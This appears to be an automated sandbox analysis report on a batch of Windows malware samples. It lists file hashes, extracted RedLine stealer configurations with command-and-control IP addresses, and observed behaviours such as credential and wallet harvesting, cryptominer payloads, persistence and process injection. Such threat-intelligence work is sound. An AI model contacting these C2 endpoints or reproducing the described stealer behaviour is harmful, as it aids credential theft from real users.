Overview
overview
10Static
static
10Fri191454c4b4.exe
windows7_x64
8Fri191454c4b4.exe
windows10_x64
8Fri1921f7a9d3.exe
windows7_x64
10Fri1921f7a9d3.exe
windows10_x64
10Fri192902b3c24.exe
windows7_x64
10Fri192902b3c24.exe
windows10_x64
10Fri192b9eeaa03b.exe
windows7_x64
10Fri192b9eeaa03b.exe
windows10_x64
10Fri192c305b4a.exe
windows7_x64
10Fri192c305b4a.exe
windows10_x64
10Fri192f077...dd.exe
windows7_x64
10Fri192f077...dd.exe
windows10_x64
10Fri195cd4d...97.exe
windows7_x64
10Fri195cd4d...97.exe
windows10_x64
10Fri19870e2...44.exe
windows7_x64
10Fri19870e2...44.exe
windows10_x64
10Fri19927b4...d1.exe
windows7_x64
10Fri19927b4...d1.exe
windows10_x64
10Fri19ca03f05489b.exe
windows7_x64
6Fri19ca03f05489b.exe
windows10_x64
6Fri19d30056588.exe
windows7_x64
10Fri19d30056588.exe
windows10_x64
10libcurl.dll
windows7_x64
3libcurl.dll
windows10_x64
3libcurlpp.dll
windows7_x64
libcurlpp.dll
windows10_x64
3libgcc_s_dw2-1.dll
windows7_x64
libgcc_s_dw2-1.dll
windows10_x64
3libstdc++-6.dll
windows7_x64
3libstdc++-6.dll
windows10_x64
3libwinpthread-1.dll
windows7_x64
1libwinpthread-1.dll
windows10_x64
1Analysis
-
max time kernel
173s -
max time network
177s -
platform
windows10_x64 -
resource
win10-en -
submitted
10-09-2021 21:28
Behavioral task
behavioral1
Sample
Fri191454c4b4.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Fri191454c4b4.exe
Resource
win10-en
Behavioral task
behavioral3
Sample
Fri1921f7a9d3.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
Fri1921f7a9d3.exe
Resource
win10-en
Behavioral task
behavioral5
Sample
Fri192902b3c24.exe
Resource
win7-en
Behavioral task
behavioral6
Sample
Fri192902b3c24.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Fri192b9eeaa03b.exe
Resource
win7-en
Behavioral task
behavioral8
Sample
Fri192b9eeaa03b.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Fri192c305b4a.exe
Resource
win7-en
Behavioral task
behavioral10
Sample
Fri192c305b4a.exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Fri192f077acf656dd.exe
Resource
win7-en
Behavioral task
behavioral12
Sample
Fri192f077acf656dd.exe
Resource
win10-en
Behavioral task
behavioral13
Sample
Fri195cd4dbfdf37897.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Fri195cd4dbfdf37897.exe
Resource
win10-en
Behavioral task
behavioral15
Sample
Fri19870e2febf5544.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
Fri19870e2febf5544.exe
Resource
win10-en
Behavioral task
behavioral17
Sample
Fri19927b4fe38a9d1.exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
Fri19927b4fe38a9d1.exe
Resource
win10-en
Behavioral task
behavioral19
Sample
Fri19ca03f05489b.exe
Resource
win7-en
Behavioral task
behavioral20
Sample
Fri19ca03f05489b.exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Fri19d30056588.exe
Resource
win7-en
Behavioral task
behavioral22
Sample
Fri19d30056588.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
libcurl.dll
Resource
win7-en
Behavioral task
behavioral24
Sample
libcurl.dll
Resource
win10v20210408
Behavioral task
behavioral25
Sample
libcurlpp.dll
Resource
win7-en
Behavioral task
behavioral26
Sample
libcurlpp.dll
Resource
win10v20210408
Behavioral task
behavioral27
Sample
libgcc_s_dw2-1.dll
Resource
win7-en
Behavioral task
behavioral28
Sample
libgcc_s_dw2-1.dll
Resource
win10-en
Behavioral task
behavioral29
Sample
libstdc++-6.dll
Resource
win7v20210408
Behavioral task
behavioral30
Sample
libstdc++-6.dll
Resource
win10-en
Behavioral task
behavioral31
Sample
libwinpthread-1.dll
Resource
win7v20210408
Behavioral task
behavioral32
Sample
libwinpthread-1.dll
Resource
win10-en
General
-
Target
Fri195cd4dbfdf37897.exe
-
Size
381KB
-
MD5
45d1381f848b167ba1bca659f0f36556
-
SHA1
bb282731c8f1794a5134a97c91312b98edde72d6
-
SHA256
8a1b542e56cf75216fcd1d1dd4bf379b8b4e7a473785013d5fbf6ce02dbdcf28
-
SHA512
a7171f37ae4612cda2c66fece92deea537942697b4580f938cdd9d07d445d89bac193e934569141fe064355b2a5e675aaa5c348298d96ff1e13dbe01732eeb0f
Malware Config
Extracted
redline
zzzzz
146.70.35.170:30905
Extracted
redline
Test
18.118.84.99:1050
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 2600 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral14/memory/4308-304-0x0000000000630000-0x0000000000652000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\wrap 1.exe family_redline C:\Users\Admin\AppData\Local\Temp\wrap 1.exe family_redline -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral14/memory/4580-294-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral14/memory/4580-295-0x00000001402EB66C-mapping.dmp xmrig behavioral14/memory/4580-297-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Blocklisted process makes network request 48 IoCs
Processes:
MsiExec.exeflow pid process 115 3960 MsiExec.exe 117 3960 MsiExec.exe 119 3960 MsiExec.exe 121 3960 MsiExec.exe 123 3960 MsiExec.exe 124 3960 MsiExec.exe 125 3960 MsiExec.exe 128 3960 MsiExec.exe 129 3960 MsiExec.exe 130 3960 MsiExec.exe 131 3960 MsiExec.exe 132 3960 MsiExec.exe 133 3960 MsiExec.exe 134 3960 MsiExec.exe 135 3960 MsiExec.exe 136 3960 MsiExec.exe 137 3960 MsiExec.exe 138 3960 MsiExec.exe 139 3960 MsiExec.exe 140 3960 MsiExec.exe 141 3960 MsiExec.exe 142 3960 MsiExec.exe 143 3960 MsiExec.exe 144 3960 MsiExec.exe 145 3960 MsiExec.exe 146 3960 MsiExec.exe 147 3960 MsiExec.exe 148 3960 MsiExec.exe 149 3960 MsiExec.exe 150 3960 MsiExec.exe 151 3960 MsiExec.exe 152 3960 MsiExec.exe 153 3960 MsiExec.exe 154 3960 MsiExec.exe 155 3960 MsiExec.exe 156 3960 MsiExec.exe 157 3960 MsiExec.exe 158 3960 MsiExec.exe 159 3960 MsiExec.exe 160 3960 MsiExec.exe 161 3960 MsiExec.exe 162 3960 MsiExec.exe 163 3960 MsiExec.exe 164 3960 MsiExec.exe 165 3960 MsiExec.exe 166 3960 MsiExec.exe 167 3960 MsiExec.exe 168 3960 MsiExec.exe -
Downloads MZ/PE file
-
Executes dropped EXE 29 IoCs
Processes:
Fri195cd4dbfdf37897.tmpSetup.exeSetup.exestats.exeConhost.exeSetup.exePublicDwlBrowser144.exe5531728.exe4260399.exe6279164.exeWinHoster.exeMortician.exeImpedire.exe.comImpedire.exe.comImpedire.exe.comforadvertising.exesihost64.exeServices.exesihost64.exeRegAsm.exewrap 1.exegdgame.exegdgame.exeinstaller.exejg6_6asg.exeIBInstaller_74449.exeIBInstaller_74449.tmpsvrwebui.exevdi_compiler.exepid process 4852 Fri195cd4dbfdf37897.tmp 5036 Setup.exe 4244 Setup.exe 4028 stats.exe 2176 Conhost.exe 1300 Setup.exe 1312 PublicDwlBrowser144.exe 2356 5531728.exe 2636 4260399.exe 4904 6279164.exe 4924 WinHoster.exe 4540 Mortician.exe 2632 Impedire.exe.com 720 Impedire.exe.com 3556 Impedire.exe.com 1088 foradvertising.exe 3700 sihost64.exe 1820 Services.exe 2196 sihost64.exe 4308 RegAsm.exe 1528 wrap 1.exe 1420 gdgame.exe 2636 gdgame.exe 3512 installer.exe 4052 jg6_6asg.exe 1020 IBInstaller_74449.exe 4312 IBInstaller_74449.tmp 4212 svrwebui.exe 4868 vdi_compiler.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
gdgame.execmd.exeSetup.exeSetup.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation gdgame.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Setup.exe -
Loads dropped DLL 40 IoCs
Processes:
Fri195cd4dbfdf37897.tmpConhost.exeMortician.exerundll32.exeinstaller.exeMsiExec.exeMsiExec.exeMsiExec.exeIBInstaller_74449.tmpsvrwebui.exepid process 4852 Fri195cd4dbfdf37897.tmp 4852 Fri195cd4dbfdf37897.tmp 2176 Conhost.exe 2176 Conhost.exe 4540 Mortician.exe 3640 rundll32.exe 3512 installer.exe 3512 installer.exe 3512 installer.exe 1080 MsiExec.exe 1080 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3512 installer.exe 3960 MsiExec.exe 3960 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 4864 MsiExec.exe 3960 MsiExec.exe 4312 IBInstaller_74449.tmp 4212 svrwebui.exe 4212 svrwebui.exe 4212 svrwebui.exe 4212 svrwebui.exe 4212 svrwebui.exe 4212 svrwebui.exe 4212 svrwebui.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
4260399.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4260399.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg6_6asg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 95 freegeoip.app 169 ip-api.com 7 ipinfo.io 9 ipinfo.io 21 ipinfo.io 90 freegeoip.app 92 freegeoip.app 93 freegeoip.app -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Services.exeImpedire.exe.comsvchost.exedescription pid process target process PID 1820 set thread context of 4580 1820 Services.exe conhost.exe PID 3556 set thread context of 4308 3556 Impedire.exe.com RegAsm.exe PID 4380 set thread context of 3888 4380 svchost.exe svchost.exe PID 4380 set thread context of 1168 4380 svchost.exe svchost.exe -
Drops file in Program Files directory 26 IoCs
Processes:
Setup.exemsiexec.exejg6_6asg.exeIBInstaller_74449.tmpdescription ioc process File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url Setup.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm jg6_6asg.exe File opened for modification C:\Program Files (x86)\Vela Netw Limited\ucrtbased.dll IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\libcueify.dll IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-0KDGJ.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File created C:\Program Files (x86)\Vela Netw Limited\unins000.dat IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-OEPEC.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-F10PK.tmp IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\unins000.dat IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe Setup.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\d jg6_6asg.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d jg6_6asg.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm jg6_6asg.exe File opened for modification C:\Program Files (x86)\Vela Netw Limited\VCItems.dll IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\PresetsQt.dll IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-CM7N7.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-PQ7E3.tmp IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.INTEG.RAW jg6_6asg.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\tmp.edb jg6_6asg.exe -
Drops file in Windows directory 41 IoCs
Processes:
msiexec.exeexpand.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIFBC1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE1A.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\f75f369.msi msiexec.exe File opened for modification C:\Windows\Installer\f75f369.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF8CD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF9C9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFAC6.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIF85E.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f75f36c.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIFDAB.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIF82E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIFD8A.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIFFE3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF5F9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE59.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF8ED.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFA28.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFDDA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE89.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSIF7EE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIFBD2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFCED.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSIF87E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFA77.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 692 2356 WerFault.exe 5531728.exe 4144 4904 WerFault.exe 6279164.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1764 schtasks.exe 5092 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4440 taskkill.exe 1676 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 26 IoCs
Processes:
svchost.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exemsiexec.exesvchost.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exegdgame.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = aec13dfe8aa6d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\7289246C77593EBF\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe 